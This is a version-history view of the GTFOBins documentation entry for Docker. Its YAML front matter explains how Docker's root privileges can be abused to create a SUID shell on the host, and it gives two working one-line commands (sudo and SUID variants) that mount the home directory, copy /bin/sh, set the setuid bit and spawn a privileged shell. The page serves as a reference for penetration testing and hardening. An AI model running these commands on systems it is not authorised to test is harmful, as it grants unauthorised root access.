GTFOBins.github.io/_gtfobins/docker.md

14 lines
614 B
Markdown
Raw Normal View History

2018-08-17 17:16:09 +02:00
---
description: |
2018-08-19 12:14:16 +02:00
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, e.g. being in the `docker` group. Any other Docker Linux image should work, e.g., `debian`.
2018-08-17 17:16:09 +02:00
functions:
sudo-enabled:
- code: |
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
2018-08-19 12:14:16 +02:00
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
suid-enabled:
- code: |
./docker run --rm -v /home/$USER:/h_docs ubuntu \
2018-08-19 12:14:16 +02:00
sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -p
2018-08-17 17:16:09 +02:00
---